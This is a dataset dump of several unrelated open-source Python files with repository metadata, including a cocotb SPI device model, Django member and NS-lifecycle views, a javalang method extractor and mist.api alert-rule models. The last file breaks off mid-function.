] | 1
|
2019-07-26T22:25:25.000Z
|
2019-07-26T22:25:25.000Z
|
examples/02_pybind/01_basic/example.py
|
BlockResearchGroup/WS_interoperability
|
604ab29c242b30b2ee9125a589afe69010ba1844
|
[
"MIT"
] | 5
|
2019-04-14T21:07:03.000Z
|
2019-05-27T21:46:37.000Z
|
examples/02_pybind/01_basic/example.py
|
BlockResearchGroup/WS_interoperability
|
604ab29c242b30b2ee9125a589afe69010ba1844
|
[
"MIT"
] | null | null | null |
# example.py
import basic
result = basic.add(1, 5)
print(result)
| 8.5
| 24
| 0.691176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 12
| 0.176471
|
4284396ea1fd88ed33820f0870333abd8149c2de
| 2,213
|
py
|
Python
|
cocotbext/spi/devices/TI/DRV8304.py
|
eoshea/cocotbext-spi
|
9b610ca27945e22e168da5774cab8051304ea90f
|
[
"MIT"
] | 2
|
2021-08-13T20:10:41.000Z
|
2022-03-09T19:24:24.000Z
|
cocotbext/spi/devices/TI/DRV8304.py
|
eoshea/cocotbext-spi
|
9b610ca27945e22e168da5774cab8051304ea90f
|
[
"MIT"
] | 3
|
2021-08-23T15:34:00.000Z
|
2022-01-18T19:27:26.000Z
|
cocotbext/spi/devices/TI/DRV8304.py
|
eoshea/cocotbext-spi
|
9b610ca27945e22e168da5774cab8051304ea90f
|
[
"MIT"
] | 2
|
2021-11-12T12:47:45.000Z
|
2021-11-18T10:35:43.000Z
|
import cocotb
from cocotb.triggers import FallingEdge, RisingEdge, First, Timer, Event
from ... import SpiSlaveBase, SpiConfig, SpiFrameError, SpiFrameTimeout
class DRV8304(SpiSlaveBase):
def __init__(self, signals):
self._config = SpiConfig(
word_width=16,
cpol=False,
cpha=True,
msb_first=True,
frame_spacing_ns=400
)
self._registers = {
0: 0b00000000000,
1: 0b00000000000,
2: 0b00000000000,
3: 0b01101110111,
4: 0b11101110111,
5: 0b00101000101,
6: 0b01010000011
}
super().__init__(signals)
async def get_register(self, reg_num):
await self.idle.wait()
return self._registers[reg_num]
def create_spi_word(self, operation, address, content):
command = 0
if operation == "read":
command |= 1 << 15
elif operation == "write":
# it is already 0
pass
else:
raise ValueError("Expected operation to be in ['read', 'write']")
try:
self._registers[address]
except KeyError:
raise ValueError(f"Expected address to be in {list(self._registers.keys())}")
command |= (address & 0b1111) << 11
command |= (content & 0b11111111111)
return command
async def _transaction(self, frame_start, frame_end):
await frame_start
self.idle.clear()
# SCLK pin should be low at the chip select edge
if bool(self._sclk.value):
raise SpiFrameError("DRV8304: sclk should be low at chip select edge")
do_write = not bool(await self._shift(1))
address = int(await self._shift(4))
content = int(await self._shift(11, tx_word=self._registers[address]))
# end of frame
if await First(frame_end, RisingEdge(self._sclk)) != frame_end:
raise SpiFrameError("DRV8304: clocked more than 16 bits")
if bool(self._sclk.value):
raise SpiFrameError("DRV8304: sclk should be low at chip select edge")
if do_write:
self._registers[address] = content
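# Minimal usage sketch (assumed, for illustration): a read of register 3
# sets bit 15 and packs the 4-bit address into bits 14..11, so
#
#     word = DRV8304(signals).create_spi_word("read", 3, 0)
#     assert word == (1 << 15) | (3 << 11)
#
# where `signals` is the SPI bus handle provided by the cocotb testbench.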
| 30.315068
| 89
| 0.589245
| 2,050
| 0.926344
| 0
| 0
| 0
| 0
| 918
| 0.414822
| 332
| 0.150023
|
4289d7f6e86034585cd9c9cf37666cc58aab806e
| 540
|
py
|
Python
|
manage.py
|
Kenneth-joseph/Blogs
|
b6c508d36cdf2f874c233485003021d10567de7b
|
[
"Unlicense"
] | null | null | null |
manage.py
|
Kenneth-joseph/Blogs
|
b6c508d36cdf2f874c233485003021d10567de7b
|
[
"Unlicense"
] | null | null | null |
manage.py
|
Kenneth-joseph/Blogs
|
b6c508d36cdf2f874c233485003021d10567de7b
|
[
"Unlicense"
] | 1
|
2021-11-17T11:03:08.000Z
|
2021-11-17T11:03:08.000Z
|
from app import create_app,db
from flask_script import Manager,Server
from app.models import User,Comment,Blog
from flask_migrate import Migrate, MigrateCommand
#manage.shell
# Creating app instance
app = create_app('production')
migrate = Migrate(app,db)
manager = Manager(app)
manager.add_command('db',MigrateCommand)
manager.add_command('server',Server)
@manager.shell
def make_shell_context():
    return dict(db=db, app=app, User=User, Comment=Comment, Blog=Blog)
if __name__ == '__main__':
manager.run()
db.create_all()
| 24.545455
| 72
| 0.766667
| 0
| 0
| 0
| 0
| 113
| 0.209259
| 0
| 0
| 70
| 0.12963
|
428a08abf8ca4b32d91aa59e5ac79f8b3eb02d8f
| 901
|
py
|
Python
|
src/apps/core/migrations/0005_auto_20180417_1219.py
|
zhiyuli/HydroLearn
|
b2c2b44e49d37391149d0896ce5124e882f22ee3
|
[
"BSD-3-Clause"
] | null | null | null |
src/apps/core/migrations/0005_auto_20180417_1219.py
|
zhiyuli/HydroLearn
|
b2c2b44e49d37391149d0896ce5124e882f22ee3
|
[
"BSD-3-Clause"
] | null | null | null |
src/apps/core/migrations/0005_auto_20180417_1219.py
|
zhiyuli/HydroLearn
|
b2c2b44e49d37391149d0896ce5124e882f22ee3
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-04-17 17:19
from __future__ import unicode_literals
from django.db import migrations
import django_extensions.db.fields
class Migration(migrations.Migration):
dependencies = [
('core', '0004_auto_20180417_1218'),
]
operations = [
migrations.AddField(
model_name='topic',
name='ref_id',
field=django_extensions.db.fields.RandomCharField(blank=True, editable=False, length=8, unique=True),
),
migrations.AlterField(
model_name='topic',
name='slug',
field=django_extensions.db.fields.AutoSlugField(blank=True, default='', editable=False, help_text='Please enter a unique slug for this Topic (can autogenerate from name field)', max_length=64, populate_from=('ref_id',), unique=True, verbose_name='slug'),
),
]
| 33.37037
| 266
| 0.657048
| 716
| 0.794673
| 0
| 0
| 0
| 0
| 0
| 0
| 224
| 0.248613
|
428b1f1d92a691f7e032bddbf0f11e16a416cdf3
| 186
|
py
|
Python
|
syncgateway/__init__.py
|
ecordell/syncgateway-admin-client
|
78a8d45ff290b42b5c771b901fb92edcde126ff4
|
[
"MIT"
] | null | null | null |
syncgateway/__init__.py
|
ecordell/syncgateway-admin-client
|
78a8d45ff290b42b5c771b901fb92edcde126ff4
|
[
"MIT"
] | 1
|
2015-12-10T20:42:12.000Z
|
2015-12-10T20:42:12.000Z
|
syncgateway/__init__.py
|
ecordell/syncgateway-admin-client
|
78a8d45ff290b42b5c771b901fb92edcde126ff4
|
[
"MIT"
] | null | null | null |
__author__ = 'Evan Cordell'
__copyright__ = 'Copyright 2012-2015 Localmed, Inc.'
__version__ = "0.1.6"
__version_info__ = tuple(__version__.split('.'))
__short_version__ = __version__
| 23.25
| 52
| 0.758065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 60
| 0.322581
|
428b51da1bd2717103e2c7bb03266fb5b3a3af22
| 7,452
|
py
|
Python
|
members/views.py
|
leonrenkema/makerspaceleiden-crm
|
36ea20f5b9e263e8f30b1831ae4a2b1d5b926d3c
|
[
"Apache-2.0"
] | 5
|
2019-03-12T21:38:32.000Z
|
2021-11-06T15:26:56.000Z
|
members/views.py
|
leonrenkema/makerspaceleiden-crm
|
36ea20f5b9e263e8f30b1831ae4a2b1d5b926d3c
|
[
"Apache-2.0"
] | 33
|
2019-01-21T15:54:50.000Z
|
2021-05-18T17:54:52.000Z
|
members/views.py
|
leonrenkema/makerspaceleiden-crm
|
36ea20f5b9e263e8f30b1831ae4a2b1d5b926d3c
|
[
"Apache-2.0"
] | 5
|
2019-01-21T15:47:26.000Z
|
2021-09-22T07:14:34.000Z
|
from django.shortcuts import render, redirect
from django.contrib.auth.forms import PasswordResetForm
from django.core.mail import EmailMessage
from django.template import loader
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.db.utils import IntegrityError
from django.urls import reverse
from django.template.loader import render_to_string, get_template
from .forms import NewUserForm, NewAuditRecordForm
from acl.models import Entitlement, PermitType
from members.models import Tag, User, clean_tag_string, AuditRecord
from mailinglists.models import Mailinglist, Subscription
import logging
import datetime
import sys
import re
logger = logging.getLogger(__name__)
@login_required
def index(request):
lst = Entitlement.objects.order_by("holder__id")
agg = {}
perms = {}
output = ""
for e in lst:
if not e.holder in agg:
agg[e.holder] = {}
perms[e.permit.name] = 1
agg[e.holder][e.permit.name] = 1
context = {
"agg": agg,
"perms": perms,
"has_permission": request.user.is_authenticated,
}
return render(request, "members/index.html", context)
@login_required
def newmember(request):
if not request.user.is_privileged:
return HttpResponse("XS denied", status=403, content_type="text/plain")
if request.POST:
form = NewUserForm(request.POST)
if form.is_valid():
try:
email = form.cleaned_data.get("email")
tag = form.cleaned_data.get("tag")
newmember = User.objects.create_user(
email=email,
first_name=form.cleaned_data.get("first_name"),
last_name=form.cleaned_data.get("last_name"),
)
# Do not set this - it silently blocks the invite mails deep in PasswordResetForm.
#
# newmember.set_unusable_password()
#
newmember.set_password(User.objects.make_random_password())
if form.cleaned_data.get("phone_number"):
newmember.phone_number = form.cleaned_data.get("phone_number")
newmember.changeReason = (
"Added by {} with the newnmeber signup form".format(request.user)
)
newmember.save()
# sanity check.
newmember = User.objects.get(email=email)
# Wire up the tag if one was provided.
if form.cleaned_data.get("tag"):
tag.reassing_to_user(
newmember,
request.user,
activate=form.cleaned_data.get("activate_doors"),
)
# Subscribe user if needed
for mlist_name in form.cleaned_data.get("mailing_lists"):
try:
mlist = Mailinglist.objects.get(name=mlist_name)
s = Subscription.objects.create(
mailinglist=mlist,
member=newmember,
active=True,
digest=False,
)
s.subscribe()
# s.changeReason("Subscribed during form based new user create")
s.save()
except Exception as e:
logger.error(
"Failed to subscribe user {} to {} : {}".format(
request.user, mlist_name, e
)
)
# Send welcome email.
form = PasswordResetForm({"email": newmember.email})
if not form.is_valid():
raise Exception("Internal issue")
form.save(
from_email=settings.DEFAULT_FROM_EMAIL,
email_template_name="members/email_newmembers_invite.txt",
subject_template_name="members/email_newmembers_invite_subject.txt",
)
return redirect("index")
except IntegrityError as e:
logger.error("Failed to create user : {}".format(e))
return HttpResponse(
"Create gone wrong. Was that email or name already added ?",
status=500,
content_type="text/plain",
)
except Exception as e:
exc_type, exc_obj, tb = sys.exc_info()
f = tb.tb_frame
lineno = tb.tb_lineno
filename = f.f_code.co_filename
logger.error(
"Failed to create user : {} at {}:{}".format(filename, lineno, e)
)
return HttpResponse(
"Create gone wrong. Drat.", status=500, content_type="text/plain"
)
else:
logger.debug("Form not valid")
context = {
"label": "Add a new member",
"title": "New Member",
"action": "Invite",
"has_permission": request.user.is_authenticated,
}
context["form"] = NewUserForm()
return render(request, "members/newmember.html", context)
@login_required
def sudo(request):
if not request.user.can_escalate_to_priveleged:
return HttpResponse("XS denied", status=403, content_type="text/plain")
if request.POST:
form = NewAuditRecordForm(request.POST)
if form.is_valid():
try:
record = form.save(commit=False)
record.user = request.user
record.changeReason = (
f"SUDO escalation in webinterface by {request.user}"
)
record.save()
return redirect(form.cleaned_data.get("return_to"))
# return redirect('index')
except Exception as e:
logger.error("Failed to create uudit recordser : {}".format(e))
return HttpResponse(
"Could not create audit record.",
status=500,
content_type="text/plain",
)
rurl = reverse("index")
if "HTTP_REFERER" in request.META:
rurl = request.META["HTTP_REFERER"]
form = NewAuditRecordForm(None, initial={"return_to": rurl})
context = {
"label": "GDPR (AVG)",
"title": "Become and admin",
"action": "go admin",
"form": form,
"back": "index",
"has_permission": request.user.is_authenticated,
"preamble": render_to_string("precooked_gdpr_options.html"),
}
return render(request, "crud.html", context)
@login_required
def drop(request):
if not request.user.can_escalate_to_priveleged:
return HttpResponse("XS denied", status=403, content_type="text/plain")
record = AuditRecord(
user=request.user, final=True, action="Drop privs from webinterface"
)
if request.user.is_privileged:
        record.changeReason = f"DROP in webinterface by {request.user}"
    else:
        record.changeReason = f"DROP in webinterface by {request.user} - but actual permission had already timed out."
record.save()
return redirect(request.META["HTTP_REFERER"])
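# A minimal sketch of how these views could be wired into a urls.py, kept as a
# comment because it belongs in a separate module; the URL paths and the
# "members" package name here are assumptions, not taken from this file:
#
#   from django.urls import path
#   from members import views
#
#   urlpatterns = [
#       path("", views.index, name="index"),
#       path("new/", views.newmember, name="newmember"),
#       path("sudo/", views.sudo, name="sudo"),
#       path("drop/", views.drop, name="drop"),
#   ]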
| 35.485714
| 118
| 0.554616
| 0
| 0
| 0
| 0
| 6,106
| 0.819377
| 0
| 0
| 1,543
| 0.207059
|
428b5eca1188b78557324447b1ddda687b1af59c
| 3,911
|
py
|
Python
|
test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns/views/deprecated/create_ns_view.py
|
lremember/VFC
|
837559db1396091811382359100bfc60e1aab5b2
|
[
"MIT"
] | 1
|
2019-10-10T00:52:18.000Z
|
2019-10-10T00:52:18.000Z
|
test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns/views/deprecated/create_ns_view.py
|
lremember/VFC-Files
|
837559db1396091811382359100bfc60e1aab5b2
|
[
"MIT"
] | null | null | null |
test_scripts/ns_instance/duan/service/vfc/nfvo/lcm/lcm/ns/views/deprecated/create_ns_view.py
|
lremember/VFC-Files
|
837559db1396091811382359100bfc60e1aab5b2
|
[
"MIT"
] | null | null | null |
# Copyright 2018 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from lcm.ns.biz.ns_create import CreateNSService
from lcm.ns.biz.ns_get import GetNSInfoService
from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsReqSerializer
from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsRespSerializer
from lcm.ns.serializers.deprecated.ns_serializers import _QueryNsRespSerializer
from lcm.pub.exceptions import NSLCMException
from lcm.pub.exceptions import BadRequestException
from lcm.pub.utils.values import ignore_case_get
from .common import view_safe_call_with_log
logger = logging.getLogger(__name__)
class CreateNSView(APIView):
@swagger_auto_schema(
request_body=None,
responses={
status.HTTP_200_OK: _QueryNsRespSerializer(help_text="NS instances", many=True),
status.HTTP_500_INTERNAL_SERVER_ERROR: "Inner error"
}
)
@view_safe_call_with_log(logger=logger)
def get(self, request):
logger.debug("CreateNSView::get")
ret = GetNSInfoService().get_ns_info()
logger.debug("CreateNSView::get::ret=%s", ret)
resp_serializer = _QueryNsRespSerializer(data=ret, many=True)
if not resp_serializer.is_valid():
raise NSLCMException(resp_serializer.errors)
return Response(data=resp_serializer.data, status=status.HTTP_200_OK)
@swagger_auto_schema(
request_body=_CreateNsReqSerializer(),
responses={
status.HTTP_201_CREATED: _CreateNsRespSerializer(),
status.HTTP_400_BAD_REQUEST: "Bad Request",
status.HTTP_500_INTERNAL_SERVER_ERROR: "Inner error"
}
)
@view_safe_call_with_log(logger=logger)
def post(self, request):
logger.debug("Enter CreateNS: %s", request.data)
req_serializer = _CreateNsReqSerializer(data=request.data)
if not req_serializer.is_valid():
raise BadRequestException(req_serializer.errors)
if ignore_case_get(request.data, 'test') == "test":
return Response(
data={'nsInstanceId': "test"},
status=status.HTTP_201_CREATED
)
csar_id = ignore_case_get(request.data, 'csarId')
ns_name = ignore_case_get(request.data, 'nsName')
description = ignore_case_get(request.data, 'description')
context = ignore_case_get(request.data, 'context')
ns_inst_id = CreateNSService(
csar_id,
ns_name,
description,
context
).do_biz()
logger.debug("CreateNSView::post::ret={'nsInstanceId':%s}", ns_inst_id)
resp_serializer = _CreateNsRespSerializer(
data={'nsInstanceId': ns_inst_id,
'nsInstanceName': 'nsInstanceName',
'nsInstanceDescription': 'nsInstanceDescription',
'nsdId': 123,
'nsdInfoId': 456,
'nsState': 'NOT_INSTANTIATED',
'_links': {'self': {'href': 'href'}}})
if not resp_serializer.is_valid():
raise NSLCMException(resp_serializer.errors)
return Response(data=resp_serializer.data, status=status.HTTP_201_CREATED)
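# A minimal usage sketch with DRF's test utilities, kept as a comment. The URL
# path is illustrative, and the payload assumes _CreateNsReqSerializer accepts
# it; only the 'test' short-circuit in post() is exercised here:
#
#   from rest_framework.test import APIRequestFactory
#
#   factory = APIRequestFactory()
#   request = factory.post('/api/nslcm/v1/ns', {'test': 'test'}, format='json')
#   response = CreateNSView.as_view()(request)
#   assert response.status_code == 201
#   assert response.data['nsInstanceId'] == 'test'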
| 41.168421
| 92
| 0.692662
| 2,575
| 0.658399
| 0
| 0
| 2,536
| 0.648428
| 0
| 0
| 968
| 0.247507
|
428be7b7fc4fa9ed70e9c54b4441f37388d4cbd4
| 3,304
|
py
|
Python
|
parse_training_input.py
|
alexpotter1/vulndetect-ml
|
338fbf919b24520f9107a1604d1c8af48aadff76
|
[
"MIT"
] | 1
|
2020-02-25T01:53:23.000Z
|
2020-02-25T01:53:23.000Z
|
parse_training_input.py
|
alexpotter1/vulndetect-ml
|
338fbf919b24520f9107a1604d1c8af48aadff76
|
[
"MIT"
] | null | null | null |
parse_training_input.py
|
alexpotter1/vulndetect-ml
|
338fbf919b24520f9107a1604d1c8af48aadff76
|
[
"MIT"
] | 1
|
2020-10-24T15:30:38.000Z
|
2020-10-24T15:30:38.000Z
|
#!/usr/bin/env python3
import javalang
def isPrimitive(obj):
return not hasattr(obj, '__dict__')
def extract_bad_function_from_text(src):
return extract_function_from_text(src, criterion='bad')
def extract_function_from_text(src, criterion='bad'):
def recursive_find_deepest_child_position(node_body, prev_deepest=0):
child_direct_child_set = None
# line number, don't currently care about column too much
if isinstance(node_body, list):
deepest_position = prev_deepest
            node_children = [c for c in node_body if c is not None]
if len(node_children) == 0:
return deepest_position
else:
if node_body.position is not None:
deepest_position = node_body.position.line
else:
deepest_position = prev_deepest
            node_children = [c for c in node_body.children if c is not None]
if len(node_children) == 0:
return deepest_position
for child in node_children:
try:
if child.position is not None:
child_sub_pos = child.position.line
else:
child_sub_pos = deepest_position
child_direct_child_set = child.children
except AttributeError:
# most likely is not an object
child_sub_pos = deepest_position
if isinstance(child, list):
child_direct_child_set = child
else:
child_direct_child_set = []
if len(child_direct_child_set) > 0:
child_sub_pos = recursive_find_deepest_child_position(child_direct_child_set, prev_deepest=child_sub_pos)
if child_sub_pos > deepest_position:
deepest_position = child_sub_pos
return deepest_position
if not isinstance(src, str):
src = src.decode('utf-8')
src_split = src.split('\n')
try:
tree = javalang.parse.parse(src)
for _, node in tree.filter(javalang.tree.MethodDeclaration):
if node.name.lower() == str(criterion).lower():
# tokenise, find the start/end of method,
# and extract from the file
# needed since javalang can't convert back to java src
start_pos = node.position.line
end_pos = None
if (len(node.body) > 0):
end_pos = recursive_find_deepest_child_position(node.body[-1])
if end_pos is None:
end_pos = start_pos
function_text = ""
for line in range(start_pos, end_pos + 1):
function_text += src_split[line - 1]
return function_text
return ""
except (javalang.parser.JavaSyntaxError,
javalang.parser.JavaParserError) as e:
print("ERROR OCCURRED DURING PARSING")
print(e)
def extract_bad_function(file_path):
return extract_function(file_path, criterion='bad')
def extract_function(file_path, criterion):
with open(file_path, 'r') as f:
return extract_function_from_text(f.read(), criterion)
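# A minimal, self-contained usage sketch (the Java snippet is illustrative):
if __name__ == '__main__':
    example_src = (
        "class Example {\n"
        "    void bad() { int x = 1; }\n"
        "    void good() { }\n"
        "}\n"
    )
    # Expected to print the source line(s) of the method named 'bad'.
    print(extract_bad_function_from_text(example_src))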
| 33.714286
| 121
| 0.59776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 305
| 0.092312
|
428caa0f2af4107e3b019feaf07304cc2bf7796d
| 17,226
|
py
|
Python
|
src/mist/api/rules/models/main.py
|
SpiralUp/mist.api
|
a3b5233ab4aa3f6a0a2dea6333ff1e5a260af934
|
[
"Apache-2.0"
] | 6
|
2017-08-24T00:34:30.000Z
|
2022-01-16T21:29:22.000Z
|
src/mist/api/rules/models/main.py
|
SpiralUp/mist.api
|
a3b5233ab4aa3f6a0a2dea6333ff1e5a260af934
|
[
"Apache-2.0"
] | 9
|
2021-03-31T18:50:47.000Z
|
2022-01-09T23:20:02.000Z
|
src/mist/api/rules/models/main.py
|
SpiralUp/mist.api
|
a3b5233ab4aa3f6a0a2dea6333ff1e5a260af934
|
[
"Apache-2.0"
] | 13
|
2017-09-21T18:17:02.000Z
|
2022-02-21T04:29:25.000Z
|
import uuid
import mongoengine as me
from mist.api import config
from mist.api.exceptions import BadRequestError
from mist.api.users.models import Organization
from mist.api.selectors.models import SelectorClassMixin
from mist.api.rules.base import NoDataRuleController
from mist.api.rules.base import ResourceRuleController
from mist.api.rules.base import ArbitraryRuleController
from mist.api.rules.models import RuleState
from mist.api.rules.models import Window
from mist.api.rules.models import Frequency
from mist.api.rules.models import TriggerOffset
from mist.api.rules.models import QueryCondition
from mist.api.rules.models import BaseAlertAction
from mist.api.rules.models import NotificationAction
from mist.api.rules.plugins import GraphiteNoDataPlugin
from mist.api.rules.plugins import GraphiteBackendPlugin
from mist.api.rules.plugins import InfluxDBNoDataPlugin
from mist.api.rules.plugins import InfluxDBBackendPlugin
from mist.api.rules.plugins import ElasticSearchBackendPlugin
from mist.api.rules.plugins import FoundationDBNoDataPlugin
from mist.api.rules.plugins import FoundationDBBackendPlugin
from mist.api.rules.plugins import VictoriaMetricsNoDataPlugin
from mist.api.rules.plugins import VictoriaMetricsBackendPlugin
class Rule(me.Document):
"""The base Rule mongoengine model.
The Rule class defines the base schema of all rule types. All documents of
any Rule subclass will be stored in the same mongo collection.
All Rule subclasses MUST define a `_controller_cls` class attribute and a
backend plugin. Controllers are used to perform actions on instances of
Rule, such as adding or updating. Backend plugins are used to transform a
Rule into the corresponding query to be executed against a certain data
storage. Different types of rules, such as a rule on monitoring metrics or
a rule on logging data, should also define and utilize their respective
backend plugins. For instance, a rule on monitoring data, which is stored
in a TSDB like Graphite, will have to utilize a different plugin than a
rule on logging data, stored in Elasticsearch, in order to successfully
query the database.
The Rule class is mainly divided into two categories:
    1. Arbitrary rules - defined entirely by the user. This type of rule gives
users the freedom to execute arbitrary queries on arbitrary data. The query
may include (nested) expressions and aggregations on arbitrary fields whose
result will be evaluated against a threshold based on a comparison operator
(=, <, etc).
2. Resource rules - defined by using Mist.io UUIDs and tags. This type of
    rule can be used to easily set up alerts on resources given their tags or
UUIDs. In this case, users have to explicitly specify the target metric's
name, aggregation function, and resources either by their UUIDs or tags.
    This type of rule allows for easier alert configuration on known resources
    at the expense of less elastic query expressions.
The Rule base class can be used to query the database and fetch documents
created by any Rule subclass. However, in order to add new rules one must
use one of the Rule subclasses, which represent different rule type, each
associated with the corresponding backend plugin.
"""
id = me.StringField(primary_key=True, default=lambda: uuid.uuid4().hex)
title = me.StringField(required=True)
owner_id = me.StringField(required=True)
# Specifies a list of queries to be evaluated. Results will be logically
# ANDed together in order to decide whether an alert should be raised.
queries = me.EmbeddedDocumentListField(QueryCondition, required=True)
# Defines the time window and frequency of each search.
window = me.EmbeddedDocumentField(Window, required=True)
frequency = me.EmbeddedDocumentField(Frequency, required=True)
# Associates a reminder offset, which will cause an alert to be fired if
# and only if the threshold is exceeded for a number of trigger_after
# intervals.
trigger_after = me.EmbeddedDocumentField(
TriggerOffset, default=lambda: TriggerOffset(period='minutes')
)
# Defines a list of actions to be executed once the rule is triggered.
# Defaults to just notifying the users.
actions = me.EmbeddedDocumentListField(
BaseAlertAction, required=True, default=lambda: [NotificationAction()]
)
# Disable the rule organization-wide.
disabled = me.BooleanField(default=False)
# Fields passed to scheduler as optional arguments.
queue = me.StringField()
exchange = me.StringField()
routing_key = me.StringField()
# Fields updated by the scheduler.
last_run_at = me.DateTimeField()
run_immediately = me.BooleanField()
total_run_count = me.IntField(min_value=0, default=0)
total_check_count = me.IntField(min_value=0, default=0)
# Field updated by dramatiq workers. This is where workers keep state.
states = me.MapField(field=me.EmbeddedDocumentField(RuleState))
meta = {
'strict': False,
'collection': 'rules',
'allow_inheritance': True,
'indexes': [
'owner_id',
{
'fields': ['owner_id', 'title'],
'sparse': False,
'unique': True,
'cls': False,
}
]
}
_controller_cls = None
_backend_plugin = None
_data_type_str = None
def __init__(self, *args, **kwargs):
super(Rule, self).__init__(*args, **kwargs)
if self._controller_cls is None:
raise TypeError(
"Cannot instantiate self. %s is a base class and cannot be "
"used to insert or update alert rules and actions. Use a "
"subclass of self that defines a `_controller_cls` class "
"attribute derived from `mist.api.rules.base:BaseController`, "
"instead." % self.__class__.__name__
)
if self._backend_plugin is None:
raise NotImplementedError(
"Cannot instantiate self. %s does not define a backend_plugin "
"in order to evaluate rules against the corresponding backend "
"storage." % self.__class__.__name__
)
if self._data_type_str not in ('metrics', 'logs', ):
raise TypeError(
"Cannot instantiate self. %s is a base class and cannot be "
"used to insert or update rules. Use a subclass of self that "
"defines a `_backend_plugin` class attribute, as well as the "
"requested data's type via the `_data_type_str` attribute, "
"instead." % self.__class__.__name__
)
self.ctl = self._controller_cls(self)
@classmethod
def add(cls, auth_context, title=None, **kwargs):
"""Add a new Rule.
New rules should be added by invoking this class method on a Rule
subclass.
Arguments:
owner: instance of mist.api.users.models.Organization
title: the name of the rule. This must be unique per Organization
kwargs: additional keyword arguments that will be passed to the
                corresponding controller in order to set up the rule
"""
try:
cls.objects.get(owner_id=auth_context.owner.id, title=title)
except cls.DoesNotExist:
rule = cls(owner_id=auth_context.owner.id, title=title)
rule.ctl.set_auth_context(auth_context)
rule.ctl.add(**kwargs)
else:
raise BadRequestError('Title "%s" is already in use' % title)
return rule
@property
def owner(self):
"""Return the Organization (instance) owning self.
We refrain from storing the owner as a me.ReferenceField in order to
avoid automatic/unwanted dereferencing.
"""
return Organization.objects.get(id=self.owner_id)
@property
def org(self):
"""Return the Organization (instance) owning self.
"""
return self.owner
@property
def plugin(self):
"""Return the instance of a backend plugin.
Subclasses MUST define the plugin to be used, instantiated with `self`.
"""
return self._backend_plugin(self)
# NOTE The following properties are required by the scheduler.
@property
def name(self):
"""Return the name of the task.
"""
return 'Org(%s):Rule(%s)' % (self.owner_id, self.id)
@property
def task(self):
"""Return the dramatiq task to run.
This is the most basic dramatiq task that should be used for most rule
evaluations. However, subclasses may provide their own property or
class attribute based on their needs.
"""
return 'mist.api.rules.tasks.evaluate'
@property
def args(self):
"""Return the args of the dramatiq task."""
return (self.id, )
@property
def kwargs(self):
"""Return the kwargs of the dramatiq task."""
return {}
@property
def expires(self):
"""Return None to denote that self is not meant to expire."""
return None
@property
def enabled(self):
"""Return True if the dramatiq task is currently enabled.
Subclasses MAY override or extend this property.
"""
return not self.disabled
def is_arbitrary(self):
"""Return True if self is arbitrary.
Arbitrary rules lack a list of `selectors` that refer to resources
either by their UUIDs or by tags. Such a list makes it easy to setup
rules referencing specific resources without the need to provide the
raw query expression.
"""
return 'selectors' not in type(self)._fields
def clean(self):
# FIXME This is needed in order to ensure rule name convention remains
# backwards compatible with the old monitoring stack. However, it will
# have to change in the future due to uniqueness constrains.
if not self.title:
self.title = 'rule%d' % self.owner.rule_counter
def as_dict(self):
return {
'id': self.id,
'title': self.title,
'queries': [query.as_dict() for query in self.queries],
'window': self.window.as_dict(),
'frequency': self.frequency.as_dict(),
'trigger_after': self.trigger_after.as_dict(),
'actions': [action.as_dict() for action in self.actions],
'disabled': self.disabled,
'data_type': self._data_type_str,
}
def __str__(self):
return '%s %s of %s' % (self.__class__.__name__,
self.title, self.owner)
class ArbitraryRule(Rule):
"""A rule defined by a single, arbitrary query string.
Arbitrary rules permit the definition of complex query expressions by
allowing users to define fully qualified queries in "raw mode" as a
single string. In such case, a query expression may be a composite query
that includes nested aggregations and/or additional queries.
An `ArbitraryRule` must define a single `QueryCondition`, whose `target`
defines the entire query expression as a single string.
"""
_controller_cls = ArbitraryRuleController
class ResourceRule(Rule, SelectorClassMixin):
"""A rule bound to a specific resource type.
Resource-bound rules are less elastic than arbitrary rules, but allow
users to perform quick, more dynamic filtering given a resource object's
UUID, tags, or model fields.
Every subclass of `ResourceRule` MUST define its `selector_resource_cls`
class attribute in order for queries to be executed against the intended
mongodb collection.
A `ResourceRule` may also apply to multiple resources, which depends on
the rule's list of `selectors`. By default such a rule will trigger an
alert if just one of its queries evaluates to True.
"""
_controller_cls = ResourceRuleController
@property
def enabled(self):
return (super(ResourceRule, self).enabled and
bool(self.get_resources().count()))
def clean(self):
# Enforce singular resource types for uniformity.
if self.resource_model_name.endswith('s'):
self.resource_model_name = self.resource_model_name[:-1]
super(ResourceRule, self).clean()
def as_dict(self):
d = super(ResourceRule, self).as_dict()
d['selectors'] = [cond.as_dict() for cond in self.selectors]
d['resource_type'] = self.resource_model_name
return d
# FIXME All following properties are for backwards compatibility.
@property
def metric(self):
        assert len(self.queries) == 1
return self.queries[0].target
@property
def operator(self):
        assert len(self.queries) == 1
return self.queries[0].operator
@property
def value(self):
        assert len(self.queries) == 1
return self.queries[0].threshold
@property
def aggregate(self):
        assert len(self.queries) == 1
return self.queries[0].aggregation
@property
def reminder_offset(self):
return self.frequency.timedelta.total_seconds() - 60
@property
def action(self):
for action in reversed(self.actions):
if action.atype == 'command':
return 'command'
if action.atype == 'machine_action':
return action.action
if action.atype == 'notification':
return 'alert'
class MachineMetricRule(ResourceRule):
_data_type_str = 'metrics'
@property
def _backend_plugin(self):
if config.DEFAULT_MONITORING_METHOD.endswith('-graphite'):
return GraphiteBackendPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-influxdb'):
return InfluxDBBackendPlugin
if config.DEFAULT_MONITORING_METHOD.endswith('-tsfdb'):
